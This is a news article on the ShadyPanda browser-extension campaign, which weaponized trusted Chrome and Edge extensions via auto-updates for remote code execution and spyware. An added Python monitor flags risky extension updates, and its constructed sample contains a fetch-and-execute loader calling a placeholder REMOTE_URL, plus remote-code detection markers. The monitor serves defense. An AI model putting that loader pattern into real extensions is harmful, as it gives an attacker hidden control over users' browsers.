ShadyPanda’s Years-Long Browser Hack Infected 4.3 Million Users
Summary: The threat group ShadyPanda used legitimate browser extensions to build trust and then planted malicious updates, affecting 4.3 million Chrome and Edge users. The group went undetected for years because marketplaces rely on static analysis at submission; the campaign involved both malware and spyware and spread through the browsers' automatic update mechanism. 2025-12-4 13:12:58 Author: securityboulevard.com (view original)

A threat group dubbed ShadyPanda spent seven years uploading seemingly legitimate extensions into browser marketplaces, building trust among its growing number of users before weaponizing the extensions with silently deployed malicious updates.

The result was 4.3 million Chrome and Edge users infected in the campaign – 300,000 users spanning five extensions, including Clean Master, and another 4 million victims of a parallel spyware campaign that involved another five Microsoft Edge extensions from the same publisher, according to researchers with Koi Security.

Among those Edge extensions was WeTab, which itself accounted for 3 million downloads.

The campaigns weren’t the result of technological expertise, Koi Security researcher Tuval Admoni wrote in a report this week. ShadyPanda exploited the traditional process that marketplaces use to review extensions.

“One patient threat actor and one lesson: Trust is the vulnerability,” Admoni wrote. “ShadyPanda proved that marketplaces still review extensions the same way they did seven years ago – static analysis at submission, trust after approval, no ongoing monitoring. Clean Master operated legitimately for five years. Static analysis wouldn’t catch this.”

Legitimacy First, Weaponization Later

The bad actors got into the marketplaces by developing and uploading legitimate extensions, then put in the malicious updates, knowing that no one was keeping an eye on what happened after that.

“The systemic problem isn’t just one malicious actor,” he wrote. “It’s that the security model incentivizes this behavior. … The strategy: build trust, accumulate users, then weaponize via a single update.”

The Long Game

Koi pointed to two operations being run by ShadyPanda. One involves five extensions that were uploaded into marketplaces, including three that were uploaded in 2018 and 2019. One of those was Clean Master, which had more than 200,000 installs. They all operated legitimately for years, to the point that Clean Master gained “Featured” and “Verified” status, adding to its legitimacy.

Before the extensions were weaponized, ShadyPanda deployed covert installation tracking to drive distribution and developed malware for them. In the middle of last year, “after accumulating 300,000+ installs, ShadyPanda pushed the malicious update,” Admoni wrote. “Automatic infection via Chrome and Edge’s trusted auto-update mechanism. All five extensions now run identical malware.”

Each infected browser runs a remote code execution (RCE) loop that checks back with ShadyPanda for instructions every hour and downloads arbitrary JavaScript. It then executes those instructions with full browser access.
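The point Admoni makes about static analysis at submission followed by no ongoing monitoring suggests the defensive counterpart: keep watching extensions after they are approved. The following is an added example, not code from Koi Security or from the article, that fingerprints each installed extension (version, declared permissions, a hash of its JavaScript, and a few markers that typically accompany a fetch-and-execute loader) and diffs two snapshots so that a quiet version bump which adds permissions or runtime code loading gets flagged. The `load_profile` helper assumes the Chromium profile layout `Extensions/<id>/<version>_0/manifest.json`; the extension id, manifests and sources are constructed sample data, and `RISKY_PERMISSIONS` and `REMOTE_CODE_MARKERS` are assumed heuristic sets, not anything the report defines.

```python
"""Snapshot-and-diff monitor for installed browser extensions (added example)."""
from __future__ import annotations

import hashlib
import json
from pathlib import Path

# Permissions whose sudden appearance in an update deserves review (assumed set)
RISKY_PERMISSIONS = {
    "webRequest", "webRequestBlocking", "cookies", "scripting",
    "history", "tabs", "declarativeNetRequest", "<all_urls>",
}

# Source markers that often accompany "fetch instructions, run them" loaders (assumed)
REMOTE_CODE_MARKERS = ("chrome.alarms.create", "fetch(", "eval(", "new Function(")


def fingerprint(manifest: dict, files: dict[str, str]) -> dict:
    """Summarise one extension version: permissions, code hash, loader markers."""
    digest = hashlib.sha256()
    for name in sorted(files):                       # deterministic order
        digest.update(name.encode())
        digest.update(b"\0")
        digest.update(files[name].encode())
        digest.update(b"\0")
    perms = set(manifest.get("permissions", []))
    perms |= set(manifest.get("host_permissions", []))   # MV3 host permissions
    markers = sorted({m for src in files.values() for m in REMOTE_CODE_MARKERS if m in src})
    return {
        "version": manifest.get("version", "?"),
        "permissions": sorted(perms),
        "code_hash": digest.hexdigest(),
        "remote_code_markers": markers,
    }


def snapshot(extensions: dict) -> dict:
    """extensions: {extension_id: (manifest_dict, {filename: source})}."""
    return {ext_id: fingerprint(m, f) for ext_id, (m, f) in extensions.items()}


def diff_snapshots(old: dict, new: dict) -> list[str]:
    """Return human-readable alerts for changes between two snapshots."""
    alerts = []
    for ext_id in sorted(new):
        cur, prev = new[ext_id], old.get(ext_id)
        if prev is None:
            alerts.append(f"{ext_id}: newly installed (v{cur['version']})")
            continue
        if cur["code_hash"] == prev["code_hash"]:
            continue                                  # unchanged, nothing to report
        change = f"{ext_id}: v{prev['version']} -> v{cur['version']}"
        added = set(cur["permissions"]) - set(prev["permissions"])
        if added:
            risky = added & RISKY_PERMISSIONS
            alerts.append(f"{change} added permissions: {', '.join(sorted(added))}"
                          + (f" (risky: {', '.join(sorted(risky))})" if risky else ""))
        new_markers = set(cur["remote_code_markers"]) - set(prev["remote_code_markers"])
        if new_markers:
            alerts.append(f"{change} new remote-code markers: {', '.join(sorted(new_markers))}")
        if not added and not new_markers:
            alerts.append(f"{change} code changed; review the update")
    return alerts


def load_profile(profile_dir: Path) -> dict:
    """Read a Chromium profile's Extensions/<id>/<version>_0/ tree (assumed layout)."""
    found = {}
    for manifest_path in profile_dir.glob("Extensions/*/*/manifest.json"):
        version_dir = manifest_path.parent
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        files = {str(p.relative_to(version_dir)): p.read_text(encoding="utf-8", errors="replace")
                 for p in version_dir.rglob("*.js")}
        found[version_dir.parent.name] = (manifest, files)
    return found


# Constructed sample: a benign "before" and a weaponized "after" of the same extension
EXT_ID = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"   # placeholder id, not a real extension
SAMPLE_BEFORE = {EXT_ID: (
    {"name": "Example Cleaner", "version": "5.2.0", "permissions": ["storage", "tabs"]},
    {"background.js": "chrome.runtime.onInstalled.addListener(() => chrome.storage.local.set({ok: 1}));"},
)}
SAMPLE_AFTER = {EXT_ID: (
    {"name": "Example Cleaner", "version": "5.3.0",
     "permissions": ["storage", "tabs", "webRequest", "cookies"],
     "host_permissions": ["<all_urls>"]},
    {"background.js": "chrome.alarms.create('poll', {periodInMinutes: 60});\n"
                      "chrome.alarms.onAlarm.addListener(async () => {\n"
                      "  const src = await (await fetch(REMOTE_URL)).text();\n"
                      "  new Function(src)();\n});"},
)}


def demo() -> list[str]:
    """Diff the constructed before/after snapshots."""
    return diff_snapshots(snapshot(SAMPLE_BEFORE), snapshot(SAMPLE_AFTER))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

In practice the snapshot would be stored after each run (a JSON file is enough) and the diff executed on a schedule; the interesting signal is not the version bump itself but an update that widens permissions or starts loading code at runtime, which is exactly what submission-time static analysis of an earlier version cannot see.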

A Backdoor

“This isn’t malware with a fixed function,” he wrote. “It’s a backdoor. ShadyPanda decides what it does. Today it’s surveillance, tomorrow it could be ransomware, credential theft, or corporate espionage. The update mechanism runs automatically, hourly, forever.”

It collects a range of information: browsing history, browser metadata such as language, platform, time zone and screen resolution, web navigation patterns, and timestamps that can be used for profiling. The collected data is encrypted with AES before it is sent out.

The malware can run man-in-the-middle attacks, intercepting and modifying traffic on the network, replacing legitimate JavaScript files with malicious versions, stealing credentials, hijacking sessions, and injecting content into websites. It also can dodge analysis by researchers, switching to benign behavior if developer tools are opened.

The code also is obfuscated, with shortened variable names, and is executed in a way that bypasses content security policies.

“ShadyPanda can update any of these capabilities hourly,” Admoni wrote. “Even though the extensions were recently removed from marketplaces, the infrastructure for full-scale attacks remains deployed on all infected browsers.”

Surveillance Operation

The second operation by Starlab Technology, the publisher of Clean Master in Edge, was a spyware campaign. Five more extensions were placed on Edge in 2023 and ran up more than 4 million installs. Admoni wrote that the operation was ongoing, but after Koi published its report, Microsoft spokespeople told news outlets that the malicious extensions had been removed from the Edge Add-on store.

Two of the five malicious extensions – including the WeTab New Tab Page – ran as a surveillance platform that appeared to be a productivity tool. Among the information collected are browsing history, search queries, mouse clicks, and browser fingerprints like screen resolution, language, and time zones. The malware also can read localStorage and sessionStorage and access cookies.

Koi found the user data WeTab collects is sent to 17 domains, including 15 in China – eight Baidu servers and seven WeTab servers – as well as Google Analytics.

Google also has told news outlets that the extensions are no longer available on the Chrome Web Store.

Links Between the Campaigns

“What linked all these campaigns together: code signing similarities, overlapping infrastructure, identical obfuscation techniques evolving over time,” Admoni wrote. “Same actor. Different masks. Each phase learned from the last – from crude affiliate fraud to patient five-year operations.”

He noted that the attack vector was the marketplaces’ auto-update mechanism, which was designed to keep users secure.

“Chrome and Edge’s trusted update pipeline silently delivered malware to users,” he wrote. “No phishing. No social engineering. Just trusted extensions with quiet version bumps that turned productivity tools into surveillance platforms.”

Source: https://securityboulevard.com/2025/12/shadypandas-years-long-browser-hack-infected-4-3-million-users/